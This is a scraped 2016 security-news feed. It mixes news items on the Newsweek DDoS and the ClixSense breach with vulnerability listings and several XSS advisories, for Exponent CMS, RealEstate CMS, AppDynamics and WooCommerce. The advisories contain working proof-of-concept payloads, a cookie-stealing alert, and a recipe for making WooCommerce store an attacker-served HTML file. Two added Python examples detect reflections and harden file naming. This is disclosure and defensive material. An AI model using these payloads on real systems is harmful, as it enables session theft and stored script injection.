
It has been an odd day for Newsweek – its main site was taken offline after it published a story claiming a company owned by Republican presidential candidate Donald Trump broke an embargo against doing deals with Cuba.

The magazine first thought that the sheer volume of interest in its scoop was the cause for the outage, but quickly realized that something more sinister was afoot.

The site was being bombarded by junk traffic from servers all around the world, but the majority came from Russia, editor-in-chief Jim Impoco has now said.

"Last night we were on the receiving end of what our IT chief called a 'massive' DoS [denial of service] attack," he told Talking Points Memo.

"As with any DDoS [distributed DoS] attack, there are lots of IP addresses, but the main ones are Russian, though that in itself does not prove anything. We are still investigating."

The story, written by staffer Kurt Eichenwald, detailed how former employees of Trump Hotels had arranged a visit to Cuba in 1998 to explore the possibility of joint ventures with the communist regime. A consultancy company called Seven Arrows made the visit, and the funds to pay for the trip were then allegedly hidden as a charitable expense.

Shortly after the story was published, traffic on the site started to rise – as you'd expect in a presidential season with serious allegations being made. But the traffic count continued to rise and eventually brought the site down.

As with any DDoS attack, attribution is nearly impossible: the source addresses tell you where the compromised machines are, not who is directing them. But it appears that the article has pissed off someone who controls a lot of Russian servers. ®



The Register - Security

Bugtraq ID: 93257
Class: Input Validation Error
CVE: CVE-2016-6607
Remote: Yes
Local: No
Published: Jul 07 2016 12:00AM
Updated: Sep 30 2016 04:02PM
Credit: Emanuel Bronshtein @e3amn2l
Vulnerable:
Typo3 phpMyAdmin 5.1.6
phpMyAdmin phpMyAdmin 4.6.2
phpMyAdmin phpMyAdmin 4.6.1
phpMyAdmin phpMyAdmin 4.6
phpMyAdmin phpMyAdmin 4.4.15
phpMyAdmin phpMyAdmin 4.4.13
phpMyAdmin phpMyAdmin 4.4.12
phpMyAdmin phpMyAdmin 4.4.11
phpMyAdmin phpMyAdmin 4.4.10
phpMyAdmin phpMyAdmin 4.4.9
phpMyAdmin phpMyAdmin 4.4.8
phpMyAdmin phpMyAdmin 4.4.7
phpMyAdmin phpMyAdmin 4.4.6
phpMyAdmin phpMyAdmin 4.4.5
phpMyAdmin phpMyAdmin 4.4.3
phpMyAdmin phpMyAdmin 4.4.2
phpMyAdmin phpMyAdmin 4.4.1
phpMyAdmin phpMyAdmin 4.4
phpMyAdmin phpMyAdmin 4.0.5
phpMyAdmin phpMyAdmin 4.0.4
phpMyAdmin phpMyAdmin 4.0.3
phpMyAdmin phpMyAdmin 4.0.2
phpMyAdmin phpMyAdmin 4.0.1
phpMyAdmin phpMyAdmin 4.0
phpMyAdmin phpMyAdmin 4.6.3
phpMyAdmin phpMyAdmin 4.4.6.1
phpMyAdmin phpMyAdmin 4.4.6.0
phpMyAdmin phpMyAdmin 4.4.15.7
phpMyAdmin phpMyAdmin 4.4.15.6
phpMyAdmin phpMyAdmin 4.4.15.5
phpMyAdmin phpMyAdmin 4.4.15.4
phpMyAdmin phpMyAdmin 4.4.15.3
phpMyAdmin phpMyAdmin 4.4.15.2
phpMyAdmin phpMyAdmin 4.4.15.1
phpMyAdmin phpMyAdmin 4.4.14.1
phpMyAdmin phpMyAdmin 4.4.14
phpMyAdmin phpMyAdmin 4.4.13.1
phpMyAdmin phpMyAdmin 4.4.1.1
phpMyAdmin phpMyAdmin 4.0.9
phpMyAdmin phpMyAdmin 4.0.8
phpMyAdmin phpMyAdmin 4.0.7
phpMyAdmin phpMyAdmin 4.0.6
phpMyAdmin phpMyAdmin 4.0.4.2
phpMyAdmin phpMyAdmin 4.0.4.1
phpMyAdmin phpMyAdmin 4.0.10.9
phpMyAdmin phpMyAdmin 4.0.10.8
phpMyAdmin phpMyAdmin 4.0.10.7
phpMyAdmin phpMyAdmin 4.0.10.6
phpMyAdmin phpMyAdmin 4.0.10.5
phpMyAdmin phpMyAdmin 4.0.10.4
phpMyAdmin phpMyAdmin 4.0.10.3
phpMyAdmin phpMyAdmin 4.0.10.2
phpMyAdmin phpMyAdmin 4.0.10.16
phpMyAdmin phpMyAdmin 4.0.10.15
phpMyAdmin phpMyAdmin 4.0.10.14
phpMyAdmin phpMyAdmin 4.0.10.13
phpMyAdmin phpMyAdmin 4.0.10.12
phpMyAdmin phpMyAdmin 4.0.10.11
phpMyAdmin phpMyAdmin 4.0.10.10
phpMyAdmin phpMyAdmin 4.0.10.1
phpMyAdmin phpMyAdmin 4.0.10
Not Vulnerable:
phpMyAdmin phpMyAdmin 4.6.4
phpMyAdmin phpMyAdmin 4.4.15.8
phpMyAdmin phpMyAdmin 4.0.10.17


SecurityFocus Vulnerabilities

========================================================================
| # Title : Exponent CMS version 2.3.9 XSS vulnerability
| # Author : indoushka
| # email : [email protected]
| # Tested on : Windows 8.1 Français (Pro)
| # Version : 2.3.9
| # Vendor : https://sourceforge.net/projects/exponentcms/files/exponent-2.3.9.zip/download
| # Dork : n/a
========================================================================

Attack details :

Affected file : /source_selector.php

The URL-encoded GET parameter time was set to 1485925200_947776'():;988077

The input is reflected inside a <script> tag, between single quotes. The leading single quote in the payload closes the JavaScript string literal, so everything after it is parsed as script; the trailing ():; keep the statement syntactically valid.

poc :

/source_selector.php?action=showall&module=event&[email protected]&time=1485925200_947776'():;988077

Greetz : jericho * Larry W. Cashdollar * moncet-1 * achraf.tn
========================================================================


Exploit Files ≈ Packet Storm

Aternity CVE-2016-5061 Multiple Cross Site Scripting Vulnerabilities

Bugtraq ID: 93210
Class: Input Validation Error
CVE: CVE-2016-5061
Remote: Yes
Local: No
Published: Sep 28 2016 12:00AM
Updated: Sep 29 2016 12:01AM
Credit: Matthew Benton and Richard Kelley.
Vulnerable: Aternity Aternity 9
Not Vulnerable:


SecurityFocus Vulnerabilities

CVE: CVE-2016-5955


SecurityFocus Vulnerabilities

Document Title:
===============
RealEstate CMS 3.00.50 - Cross Site Web Vulnerability

Release Date:
=============
2016-09-08

Vulnerability Disclosure Timeline:
==================================
2016-09-23 : Public Disclosure

Product & Service Introduction:
===============================
RealEstate CMS is a web portal script designed for realty agents, realtors or brokers to sell, buy, trade, rent and let their clients' property online. It is a web-based content management system built on PHP and MySQL and used by real estate companies to promote properties: feature-rich, SEO-friendly, with an easy-to-use interface and a protected admin area.

(Copy of the Vendor Homepage: http://www.script4realestate.com/ )

Affected Product(s):
====================
Product: Realestate v3.00.50 - Content Management System

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-
A client-side cross site scripting web vulnerability has been discovered in the official Realestate v3.00.50 content management system.
The vulnerability allows a remote attacker to inject malicious script code on the client side of the vulnerable module or service.

The vulnerability is located in the search engine: the property_name, post_code and property_price values submitted to the search form
are echoed back unencoded, both inside HTML attribute values and inside a JavaScript string literal. An attacker who gets a user or
administrator to submit a crafted search (for example from a page that auto-submits the form, since the request is a POST) can execute
JavaScript in their browser and steal session credentials. No account on the application is needed to trigger the issue.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Add (Input)

Vulnerable Parameter(s):
[+] property_name
[+] post_code
[+] property_price

Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without a privileged user account and with low user interaction.
To reproduce it for a security demonstration, follow the information and steps below.

--- PoC Session Logs [POST] ---
Status: 200 [OK]
Host: realestate.localhost:8000/
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://realestate.localhost:8000/
Cookie: PHPSESSID=8897722dac6adcebc9a966069e91ea83; __unam=6aaa37b-1570a42f57e-507aafb3-2; __utma=261436815.141070340.1473345943.1473345943.1473345943.1; __utmb=261436815.2.10.1473345943; __utmc=261436815; __utmz=261436815.1473345943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 529
block_search=search&property_name='"/>></script><script>alert("vulnerabilitylab")</script>&post_code='"/>></script><script>alert("vulnerabilitylab")</script>&category_id_arr%5B%5D=any&property_type=any&property_price='"/>></script><script>alert("vulnerabilitylab")</script>&property_price-gte=any&property_price-lte=any&feature_room_no-gte=any&feature_bathroom-gte=any&country_id=227&state_id=any&area_id=any&property_owner=any

--- PoC: Source ---
<div class="form-group">
<label>Post Code:</label>
<input type="text" name="post_code" id="post_code" placeholder="Any" value="'"/>></script><script>alert("vulnerabilitylab")</script>" class="form-control">
<input type="hidden" name="block_search" value="search" />
</div>
<div class="form-group">
<input name="property_name" id="property_name" operator="contains" type="text" placeholder="Property Name"
value="'"/>></script><script>alert("vulnerabilitylab")</script>" class="form-control"/>
</div>
<script type="text/javascript">
//<!--
field: "property_price", operator: $ ("#property_price").attr('operator'), value: ""'"/>></script><script>alert("vulnerabilitylab")</script>",
//-->
</script>
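Both the Exponent PoC above (a single-quoted string inside a <script> tag) and this RealEstate PoC (attribute values plus a double-quoted JavaScript string) come down to the same question: does the quote character that ends the surrounding context survive unencoded? The following is an added example, not code from either advisory, that submits the same shape of canary and classifies each reflection by context. The response bodies are constructed here to mirror the sinks shown in the two PoCs; the marker string zq7 and the helper names are this example's own.

```python
"""Context-aware check for reflected input, added as an example for this page.

For each place the canary comes back in a (constructed) response, work out which
context it landed in and whether the character that breaks out of that context
survived unencoded:

  attribute value      -> a raw ' or " ends the value
  <script> string      -> a raw ' or " ends the literal (Exponent, RealEstate)
  text between tags    -> a raw < opens a tag

An entity- or \\u-escaped reflection is reported as not exploitable.
"""
import html
import re
from dataclasses import dataclass

MARK = "zq7"                   # alphanumeric marker so the canary is easy to find again
SPECIALS = "'\"<():;"          # quote chars, a tag opener and the JS punctuation from the PoCs
CANARY = MARK + SPECIALS + MARK

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
REFLECT_RE = re.compile(re.escape(MARK) + r"(.{0,40}?)" + re.escape(MARK), re.S)


@dataclass
class Finding:
    context: str     # "script", "attribute" or "text"
    echoed: str      # what came back between the two markers
    breakout: bool   # True if the context's break-out character survived raw


def context_at(body: str, pos: int) -> str:
    """Classify offset pos: inside a <script> body, inside a tag (attribute), or text."""
    for m in SCRIPT_RE.finditer(body):
        if m.start(1) <= pos < m.end(1):
            return "script"
    last_open = body.rfind("<", 0, pos)
    last_close = body.rfind(">", 0, pos)
    return "attribute" if last_open > last_close else "text"


def breaks_out(context: str, echoed: str) -> bool:
    if context in ("script", "attribute"):
        return "'" in echoed or '"' in echoed
    return "<" in echoed


def find_reflections(body: str) -> list:
    """Return one Finding per reflection of the canary in body."""
    findings = []
    for m in REFLECT_RE.finditer(body):
        ctx = context_at(body, m.start())
        findings.append(Finding(ctx, m.group(1), breaks_out(ctx, m.group(1))))
    return findings


def exploitable(body: str) -> bool:
    return any(f.breakout for f in find_reflections(body))


# Constructed responses (not captured from either product), modelled on the sinks above.
RESP_REALESTATE = (
    '<div class="form-group"><label>Post Code:</label>'
    '<input type="text" name="post_code" value="' + CANARY + '" class="form-control"></div>'
    '<script type="text/javascript">var q = {field: "property_price", value: "' + CANARY + '"};</script>'
)
RESP_EXPONENT = "<script>var t = '" + CANARY + "';</script>"
RESP_TEXT = "<p>Results for " + CANARY + "</p>"
# The same two sinks after htmlspecialchars() and json_encode() with the JSON_HEX_* flags.
RESP_FIXED = (
    '<input name="post_code" value="' + MARK + html.escape(SPECIALS, quote=True) + MARK + '">'
    "<script>var t = '" + MARK + r"\u0027\u0022\u003c():;" + MARK + "';</script>"
)

if __name__ == "__main__":
    for name, body in [("realestate", RESP_REALESTATE), ("exponent", RESP_EXPONENT),
                       ("text", RESP_TEXT), ("fixed", RESP_FIXED)]:
        for f in find_reflections(body):
            print(f"{name:10} {f.context:9} breakout={f.breakout} echoed={f.echoed!r}")
```

The context check is deliberately crude (it does not parse HTML), but it is enough to tell a reflection that is merely present from one where the breakout character is intact, which is the difference between a scanner hit and a confirmed finding.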

Reference(s):
http://realestate.localhost:8000/

[+] Disclaimer [+]
===================
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

Domain: www.zwx.fr
Contact: [email protected]
Social: twitter.com/XSSed.fr
Feeds: www.zwx.fr/feed/
Advisory: www.vulnerability-lab.com/show.php?user=ZwX
packetstormsecurity.com/files/author/12026/
cxsecurity.com/search/author/DESC/AND/FIND/0/10/ZwX/
0day.today/author/27461

Copyright © 2016 | ZwX - Security Researcher (Software & web application)


Exploit Files ≈ Packet Storm

=============================================================================================================================================
XSS in AppDynamics 4.2.3.1 build 57
Affected module : policy creation
Affected parameter : policy name
Tested on : live AppDynamics SaaS instance
Product : application performance monitoring tool; agents installed on remote servers report into the GUI, which lets users create custom rules and policies.
Payload : <script>alert(document.cookie)</script>
Security Researcher : Govind Singh aka NullPort

=============================================================================================================================================

1. Log in, click Alert & Respond, select Policies, then pick the application for which you want to create a policy. Click Create Policy Manually.

2. In Create Policy, give the policy a name (here: policy) and click Next.

3. Click Create Action under Actions to execute, and press OK.

4. In the Create Diagnostic Session Action dialog, put the XSS payload in the Name field and click OK.

5. The policy now exists with the payload stored in it; press Save.

6. When you press Save the payload executes and the XSS popup appears with the cookie value.


Exploit Files ≈ Packet Storm

Vulnerable: IBM Tivoli Storage Productivity Center 5.2.10
IBM Tivoli Storage Productivity Center 5.2.6
IBM Tivoli Storage Productivity Center 5.2.5
IBM Tivoli Storage Productivity Center 5.2.2
IBM Tivoli Storage Productivity Center 5.2.1 0
IBM Tivoli Storage Productivity Center 5.2
IBM Tivoli Storage Productivity Center 5.2.7.1
IBM Tivoli Storage Productivity Center 5.2.7
IBM Tivoli Storage Productivity Center 5.2.5.1
IBM Tivoli Storage Productivity Center 5.2.4.1
IBM Tivoli Storage Productivity Center 5.2.4
IBM Tivoli Storage Productivity Center 5.2.3
IBM Tivoli Storage Productivity Center 5.2.1.1
IBM Spectrum Control 5.2.11
IBM Spectrum Control 5.2.10
IBM Spectrum Control 5.2.9
IBM Spectrum Control 5.2.8
IBM Spectrum Control 5.2.10.1


SecurityFocus Vulnerabilities

If you’ve ever registered with ClixSense – and millions have – you can consider all your personal information shared with the service compromised.

ClixSense

The company behind the popular Paid To Click site has been breached: the site (Clixsense.com) was made to redirect to a gay porn site, its Microsoft Exchange server and web servers were compromised, and an old database server containing users’ information was pilfered some ten days ago.

The stolen information includes users’ name, email and IP address, home address, date of birth, sex, account balance, payment history, as well as their password in plaintext.

The company has confirmed the hack to Ars Technica, and said that it has forced a password reset on all of its 6.6 million registered users.

Users who have reused the same password on other online accounts should change it there too, and should be on the lookout for convincing phishing attempts by crooks using their stolen information.

It is a very realistic scenario, as the attackers are offering the account records for sale, along with emails exchanged by the company’s employees and the complete source code for the site.

They have released a sample of the stolen data, containing that of early users, as proof.

Unlike previous mega data breaches, this one is not old – the user database has been dumped earlier this month, so all the information contained in it should be up to date.

Of course, it’s possible that some users have entered incorrect information when asked, and given what’s happened, I say good on them.

“It has come to our attention that this hacker did get access to our database server for a short period of time. He was able to gain access to this not directly but instead through an old server we were no longer using that had a connection to our database server. (This server has since been terminated),” Clixsense explained in a post about the incident.

“He was able to copy most if not all of our users table, he ran some SQL code that changed the names on accounts to ‘hacked account’ and deleted many forum posts. He also set user balances to $0.00.”

After all that, the company had the nerve to say that the incident “has taught us that regardless of what you do to stay secure, it still may not be enough,” and that users’ “ClixSense account information is now much more secure.”

Never mind that it should have been secure in the first place… Why was an old server that’s no longer in use still connected to their database server? And, for that matter, why were passwords stored in plain text? None of this inspires much confidence that they will “do” security better in the future.

But none of this matters much to the affected users: much of their personal info has been compromised, and there is no going back.


Help Net Security

------------------------------------------------------------------------
Persistent Cross-Site Scripting in Woocommerce WordPress plugin
------------------------------------------------------------------------
Sipke Mellema, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A vulnerability exists in the Woocommerce API that allows for the
creation of malicious HTML files when an image is downloaded from an
attacker controlled URL.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160719-0002

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Woocommerce version 2.6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Woocommerce version 2.6.4.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_wordpress_plugin.html

The vulnerability exists in multiple places in the code. This description will use the code located at:
/includes/api/legacy/v3/class-wc-api-products.php
The vulnerable method is called upload_image_from_url. This method is used for adding product and product category images from a URL. wp_check_filetype is used to retrieve a file type for the filename in the URL.

$wp_filetype = wp_check_filetype( $file_name, null );

wp_check_filetype checks if the file extension matches the array of extensions returned by wp_get_mime_types. wp_get_mime_types returns a big list of file types, including HTML and most image files. It does not include the PHP file extension.

If the file type cannot be determined by wp_check_filetype from the URL (for example, if the URL ends with .php), the code will retrieve the file from the server headers.

// Ensure we have a file name and type.
if ( ! $wp_filetype['type'] ) {
    $headers = wp_remote_retrieve_headers( $response );
    if ( isset( $headers['content-disposition'] ) && strstr( $headers['content-disposition'], 'filename=' ) ) {
        $disposition = end( explode( 'filename=', $headers['content-disposition'] ) );
        $disposition = sanitize_file_name( $disposition );
        $file_name   = $disposition;
    } elseif ( isset( $headers['content-type'] ) && strstr( $headers['content-type'], 'image/' ) ) {
        $file_name = 'image.' . str_replace( 'image/', '', $headers['content-type'] );
    }
}

The remote server now controls the file name, either through the Content-Disposition header or by sending a Content-Type such as image/html. PHP files cannot be created, because wp_upload_bits is called on the new file name and its extension must be in the array returned by wp_get_mime_types.

Other files that contain the vulnerable code pattern are:
/woocommerce/includes/wc-rest-functions.php
/woocommerce/includes/cli/class-wc-cli-product.php
/woocommerce/includes/api/legacy/v3/class-wc-api-products.php
/woocommerce/includes/api/legacy/v2/class-wc-api-products.php

Because WordPress identifies itself in the User-Agent header when requesting the image, an attacker can serve a normal image to ordinary visitors and return the HTML file only when the Woocommerce API makes the request.

HTML files will not be included as a category image but will show up in the media library.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------

This attack can be done when the called URL does not end in a file type included in wp_get_mime_types. For example, in the case where a popular image is shown by a PHP script.

On an external server, create a file called image.php with the following content:

<?php
header("content-disposition: filename=poc.html");
echo "<script>alert(1)</script>";
?>

Now perform a PUT request to:

/wc-api/v3/products/categories/<valid id>?consumer_key=<key>&consumer_secret=<secret>

With the JSON body:

{"product_category":{"image":"http://<external server>/image.php"}}

The category image will be empty, and a file poc.html will appear in the upload folder.
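The name-selection logic the advisory quotes, and one way to harden it, as an added example in Python. This is not WooCommerce's code and not the vendor's 2.6.4 fix: legacy_file_name() models the quoted PHP (trust the URL's extension; if that is not a known type, let the response's Content-Disposition or Content-Type choose the name), and hardened_file_name() ignores what the remote server says and derives the extension from the image's own magic bytes, so a PHP script that serves a real PNG still works and anything else is refused. wp_check_filetype and sanitize_file_name here are simplified stand-ins for the WordPress functions of the same name, and the URLs and headers are constructed to match the PoC above.

```python
"""How upload_image_from_url picks a file name, and one hardening of it (added example)."""
import os
import re
from urllib.parse import urlparse

# Slice of what wp_get_mime_types() returns; the point is that html is in it and php is not.
WP_EXT_TO_MIME = {
    "jpg": "image/jpeg", "jpeg": "image/jpeg", "png": "image/png", "gif": "image/gif",
    "html": "text/html", "htm": "text/html", "txt": "text/plain",
}

MAGIC = {  # file signatures for the image types we are willing to store
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "jpg": b"\xff\xd8\xff",
}


def wp_check_filetype(name: str):
    """Stand-in: the extension if wp_get_mime_types knows it, else None."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    return ext if ext in WP_EXT_TO_MIME else None


def sanitize_file_name(name: str) -> str:
    """Stand-in: drop any path component, quotes and characters outside [A-Za-z0-9._-]."""
    return re.sub(r"[^A-Za-z0-9._-]", "", os.path.basename(name.strip().strip('"')))


def legacy_file_name(url: str, headers: dict):
    """Name the quoted code would hand to wp_upload_bits, or None if it would be rejected."""
    file_name = os.path.basename(urlparse(url).path)
    if wp_check_filetype(file_name) is None:
        h = {k.lower(): v for k, v in headers.items()}
        cd, ct = h.get("content-disposition", ""), h.get("content-type", "")
        if "filename=" in cd:                       # end(explode('filename=', ...))
            file_name = sanitize_file_name(cd.split("filename=")[-1])
        elif "image/" in ct:                        # strstr($ct, 'image/') + str_replace
            file_name = "image." + ct.replace("image/", "")
    # wp_upload_bits refuses extensions wp_get_mime_types does not list, so no .php.
    return file_name if wp_check_filetype(file_name) else None


def hardened_file_name(url: str, headers: dict, body: bytes):
    """Extension from the bytes, never from the URL or the remote server's headers.

    headers is accepted only to keep the signature parallel; it is deliberately unused.
    """
    for ext, magic in MAGIC.items():
        if body.startswith(magic):
            stem = sanitize_file_name(os.path.basename(urlparse(url).path)).rsplit(".", 1)[0]
            return f"{stem or 'image'}.{ext}"
    return None   # not an image we recognise: do not store it under any name


if __name__ == "__main__":
    poc = {"Content-Disposition": "filename=poc.html"}          # the advisory's image.php
    html_body = b"<script>alert(1)</script>"
    print(legacy_file_name("http://attacker.example/image.php", poc))
    print(hardened_file_name("http://attacker.example/image.php", poc, html_body))
```

The legacy path shows both of the advisory's claims: poc.html and image.html are accepted because wp_get_mime_types lists html, while shell.php is refused because it does not list php. The hardened path stores only what sniffs as an image, under an extension chosen from the content rather than from anything the attacker's server sent.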

------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.


Exploit Files ≈ Packet Storm